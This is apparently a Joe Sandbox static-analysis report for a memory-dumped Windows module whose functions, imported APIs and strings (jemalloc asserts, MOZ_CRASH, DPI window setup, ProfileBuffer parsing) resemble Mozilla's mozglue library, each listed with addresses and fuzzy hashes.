MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C9F37D2
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C9F3559, 6C9F382D, 6C9F3848
<jemalloc>, xrefs: 6C9F3941, 6C9F39F1
Compile-time page size does not divide the runtime one., xrefs: 6C9F3946
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9F37A8
: (malloc) Unsupported character in malloc options: ', xrefs: 6C9F3A02
MALLOC_OPTIONS, xrefs: 6C9F35FE

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: b068fd7687e3e0e02c663749f96a902d59643423694caff780cbe886a2718a0e
Instruction ID: 8fdc686e7a7a9cc0ddb11595fd549d5021dc85437ae38d93c76e09ff7e8542b0
Opcode Fuzzy Hash: b068fd7687e3e0e02c663749f96a902d59643423694caff780cbe886a2718a0e
Instruction Fuzzy Hash: 6C538BB1A057428FD304CF28C550715BBE5BF8A328F29C6ADE8799B791D375E842CB81

Function 6CA155F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C9EE1A5), ref: 6CA15606
LoadLibraryW.KERNEL32(gdi32,?,6C9EE1A5), ref: 6CA1560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CA15633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CA1563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CA1566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CA1567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CA15696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CA156B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CA156CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CA156E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CA156FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CA15716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CA1572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CA15748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CA15761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CA1577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CA15793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CA157A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CA157BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CA157D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CA157EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CA157FF

Strings

MonitorFromWindow, xrefs: 6CA1578D
GetThreadDpiAwarenessContext, xrefs: 6CA1562D
RegisterClassW, xrefs: 6CA156AC
GetWindowDC, xrefs: 6CA15710
gdi32, xrefs: 6CA1560A
user32, xrefs: 6CA15601
SetWindowPos, xrefs: 6CA156F7
GetDpiForWindow, xrefs: 6CA15690
AreDpiAwarenessContextsEqual, xrefs: 6CA15637
GetMonitorInfoW, xrefs: 6CA157A2
CreateSolidBrush, xrefs: 6CA157E4
GetSystemMetricsForDpi, xrefs: 6CA15677
FillRect, xrefs: 6CA15729
LoadCursorW, xrefs: 6CA15774
StretchDIBits, xrefs: 6CA157CC
DeleteObject, xrefs: 6CA157F9
ShowWindow, xrefs: 6CA156DE
CreateWindowExW, xrefs: 6CA156C5
EnableNonClientDpiScaling, xrefs: 6CA15666
LoadIconW, xrefs: 6CA1575B
ReleaseDC, xrefs: 6CA15742
SetWindowLongPtrW, xrefs: 6CA157B7

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 3d0e3aefa8ffc54bca10509c21ff83e25f3b6fdd2b2d858154ad18ffbd05646e
Instruction ID: 41945b2beeb8733fec9f61f29c5d5adb1a0a29146d45298edefb87386ee3ff75
Opcode Fuzzy Hash: 3d0e3aefa8ffc54bca10509c21ff83e25f3b6fdd2b2d858154ad18ffbd05646e
Instruction Fuzzy Hash: F8510771B157135FDB14AF388D68A263AF9BB46245724C52DE919E2E41EF34C842CFB0

Function 6CA134A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA1355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA135BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA135E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA1363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA136CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA1373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA1378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA138BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA139EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13EE2

Part of subcall function 6CA16180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6CA161DD
Part of subcall function 6CA16180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6CA1622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA140F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA1412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA14157

Part of subcall function 6CA16180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CA16250
Part of subcall function 6CA16180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA16292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA1441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA14448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CA1484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CA14863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CA14878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CA14896
free.MOZGLUE ref: 6CA1489F

Strings

, xrefs: 6CA14CD2

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: 73ddee6107e8fd16017c9113b8942af5cb25263e72748a670819795c3c161b53
Instruction ID: ce65634663e89e0945cd8c6776f7b15ac83c94263169e80604ae10985a26079d
Opcode Fuzzy Hash: 73ddee6107e8fd16017c9113b8942af5cb25263e72748a670819795c3c161b53
Instruction Fuzzy Hash: DDF26B74908B818FC735CF28C18469AFBF1FF89358F158A5ED98997712DB319886CB42

Function 6C9C64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C9C64DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C9C64F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C9C6505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C9C6518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C9C652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C9C671C
GetCurrentProcess.KERNEL32 ref: 6C9C6724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C9C672F
GetCurrentProcess.KERNEL32 ref: 6C9C6759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C9C6764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C9C6A80
GetSystemInfo.KERNEL32(?), ref: 6C9C6ABE
__Init_thread_footer.LIBCMT ref: 6C9C6AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9C6AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9C6AF7

Strings

nvdxgiwrap.dll, xrefs: 6C9C6513
_etoured.dll, xrefs: 6C9C64ED
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C9C6798
user32.dll, xrefs: 6C9C6526
detoured.dll, xrefs: 6C9C64DA
nvd3d9wrap.dll, xrefs: 6C9C6500

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: d89b7ea0bbf77034996c93e75156f852877b0363659f58f45cb0f52673453836
Instruction ID: 1d77d5da7ddf04d27c2d69efecbbeb688989201b2cdec942529a7698e7527899
Opcode Fuzzy Hash: d89b7ea0bbf77034996c93e75156f852877b0363659f58f45cb0f52673453836
Instruction Fuzzy Hash: 41F1D470A057299FDB20CF24CD48BAAB7B5AF46318F1482D9D809E7681D731EE85CF52

Function 6C9E60A0 Relevance: 50.1, APIs: 22, Strings: 6, Instructions: 1142COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9E60C9
LeaveCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9E610D
EnterCriticalSection.KERNEL32(?), ref: 6C9E618C
LeaveCriticalSection.KERNEL32(?), ref: 6C9E61F9

Strings

MOZ_CRASH(), xrefs: 6C9E6AB8
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C9E6BC7, 6C9E6F97, 6C9E6FB2
<jemalloc>, xrefs: 6C9E6AA9, 6C9E6B59
Compile-time page size does not divide the runtime one., xrefs: 6C9E6AAE
: (malloc) Unsupported character in malloc options: ', xrefs: 6C9E6B6A
MALLOC_OPTIONS, xrefs: 6C9E6888

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3168844106-429003945
Opcode ID: a0001550c55ebeb3b2673ce0c922ecc2c59f85486e78b567cf39a1727ee4fcc3
Instruction ID: 893838521b157a88e658df27b28492f956a983cc985848bb7939f37aac908fea
Opcode Fuzzy Hash: a0001550c55ebeb3b2673ce0c922ecc2c59f85486e78b567cf39a1727ee4fcc3
Instruction Fuzzy Hash: 26A2CC71A057118FD719CF18C854715BBE1BFAA328F29C66DEA69CBB91C731E841CB80

Function 6CA1C4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1C5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1C6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6CA1C74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6CA1C7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6CA1C9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1CC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CA1CD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1DB40
memcpy.VCRUNTIME140(?,?,?), ref: 6CA1DB62
memcpy.VCRUNTIME140(?,?,?), ref: 6CA1DB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1DD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CA1DE95
memcpy.VCRUNTIME140(?,?,?), ref: 6CA1E360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1E432
memcpy.VCRUNTIME140(?,?,?), ref: 6CA1E472

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 19f6a8cfc5d45f856abce0d64aeb23febb3d91cbbae93368d9c7246ff01f1111
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: 27339E71E0421A8FCB04CFACC8806EDBBF2FF49314F284269D955ABB55D735A985CB90

Function 6C9CFD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CA3E7B8), ref: 6C9CFF81
LeaveCriticalSection.KERNEL32(6CA3E7B8), ref: 6C9D022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C9D0240
EnterCriticalSection.KERNEL32(6CA3E768), ref: 6C9D025B
LeaveCriticalSection.KERNEL32(6CA3E768), ref: 6C9D027B

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C9D0D67, 6C9D0D7B, 6C9D0DAC
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C9CFE99, 6C9CFEB7, 6C9CFED3, 6C9D0DB8, 6C9D0DD3, 6C9D19B4
<jemalloc>, xrefs: 6C9D0D62, 6C9D0D76, 6C9D0DA7

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: b898350a494f930af60209a85a9d38ef3588b4bb21b6b6c9ab34d533251736d4
Instruction ID: 1cfdadd0164a47e231306ed6eeebdba1867e0ee94783f1a6187c87206daeb1aa
Opcode Fuzzy Hash: b898350a494f930af60209a85a9d38ef3588b4bb21b6b6c9ab34d533251736d4
Instruction Fuzzy Hash: B9C2D171A05B418FD714CF28C890716BBE1FF86328F29C66DE8A99B795C771E841CB81

Function 6CA1E680 Relevance: 31.1, APIs: 22, Instructions: 3648COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00004014), ref: 6CA1E811
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1EAA8
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CA1EBD5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1EEF6
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1F223
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CA1F322
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA20E03
memcpy.VCRUNTIME140(?,?,?,?), ref: 6CA20E54
memcpy.VCRUNTIME140(?,?,?), ref: 6CA20EAE
memcpy.VCRUNTIME140(?,?,?), ref: 6CA20ED4

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 8a1a0127267f778c40f6f13db4c89e94da3b6c0c85d40002d19a30581f4714e4
Instruction ID: b4d6bfffbd3e3b8d10c819755269ed05d420b2f87b4030dad4c10677cda3c962
Opcode Fuzzy Hash: 8a1a0127267f778c40f6f13db4c89e94da3b6c0c85d40002d19a30581f4714e4
Instruction Fuzzy Hash: 5263A071E0425A8FCB04CFACC8905EDFBB2FF89310F298269D855AB755D734A985CB90

Function 6C9F3E50 Relevance: 27.0, APIs: 13, Strings: 2, Instructions: 765COMMON

Download Yara Rule

APIs

Part of subcall function 6CA17770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C9F3E7D,?,?,?,6C9F3E7D,?,?), ref: 6CA1777C

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C9F3F17
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C9F3F5C
VerSetConditionMask.NTDLL ref: 6C9F3F8D
VerSetConditionMask.NTDLL ref: 6C9F3F99
VerSetConditionMask.NTDLL ref: 6C9F3FA0
VerSetConditionMask.NTDLL ref: 6C9F3FA7
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C9F3FB4

Strings

nvinit.dll, xrefs: 6C9F4479
nvd3d9wrap.dll, xrefs: 6C9F4466

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
String ID: nvd3d9wrap.dll$nvinit.dll
API String ID: 1189858803-2380496106
Opcode ID: b95ad87a4cf2a82fc79c7dfe0696f81268e068bcb3903fee813142f9c570df04
Instruction ID: cda434f3f988f25b3b57102400befb25bf0fbd1ed556504e92a265d82e424ad1
Opcode Fuzzy Hash: b95ad87a4cf2a82fc79c7dfe0696f81268e068bcb3903fee813142f9c570df04
Instruction Fuzzy Hash: 33520171610B498FD715DB748980BAB77FABF61204F14492CD4A6CBB42CB38F90ACB61

Function 6C9DED10 Relevance: 25.4, APIs: 16, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C9DEE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C9DEFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C9E1695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9E16B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C9E1770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C9E1A3E

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID:
API String ID: 3693777188-0
Opcode ID: 8da3bc6d1ea8a30474521edd544c0002e9f3453f7c7b28f788445a7fc53470dd
Instruction ID: 541ac7c7bafaf15d73f35c6c376800af1724e6f22fc5726f3473f76e678e0906
Opcode Fuzzy Hash: 8da3bc6d1ea8a30474521edd544c0002e9f3453f7c7b28f788445a7fc53470dd
Instruction Fuzzy Hash: 29B31971E0421ACFCB15CFA8C890AADB7B2BF59304F1582A9D449BB755D730AD86CF90

Function 6C9CFEF0 Relevance: 23.8, APIs: 13, Strings: 2, Instructions: 1294memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CA3E7B8), ref: 6C9CFF81
LeaveCriticalSection.KERNEL32(6CA3E7B8), ref: 6C9D022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C9D0240
EnterCriticalSection.KERNEL32(6CA3E768), ref: 6C9D025B
LeaveCriticalSection.KERNEL32(6CA3E768), ref: 6C9D027B

Strings

MOZ_CRASH(), xrefs: 6C9D0CA7
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C9CFE99, 6C9CFEB7, 6C9CFED3, 6C9D0DB8, 6C9D0DD3, 6C9D19B4, 6C9D1A10

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3566792288
Opcode ID: 42895fa82e7c2cd5160adaec2956606ac98a1f1a83007ce8844999fe9c204a12
Instruction ID: d47846b06f5ea7ac2e65f6aebf00d7472124d71341c1c5746a2cf57e512831c7
Opcode Fuzzy Hash: 42895fa82e7c2cd5160adaec2956606ac98a1f1a83007ce8844999fe9c204a12
Instruction Fuzzy Hash: 6FB2CF71605B418FD718CF29C990716BBE1BF86328F29C66DE86A9FB95C770E840CB41

Function 6CA05600 Relevance: 22.0, APIs: 6, Strings: 6, Instructions: 950COMMON

Download Yara Rule

Strings

schema, xrefs: 6CA0606D
data, xrefs: 6CA06131
expected a Count entry, xrefs: 6CA05AC3
name, xrefs: 6CA05E79, 6CA05E8F
ProfileBuffer parse error: %s, xrefs: 6CA05AC8, 6CA05CBB
expected a Time entry, xrefs: 6CA05CB6

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID:
String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
API String ID: 0-2712937348
Opcode ID: d4a410ec2cf50aa0d0596d7b2b0961903cbb26e573d2d8c1b0bce98874783e88
Instruction ID: d8f1ae61e585ece84a9c185f8237f145d1055ff25c335fc5ddfcf8520b6c585e
Opcode Fuzzy Hash: d4a410ec2cf50aa0d0596d7b2b0961903cbb26e573d2d8c1b0bce98874783e88
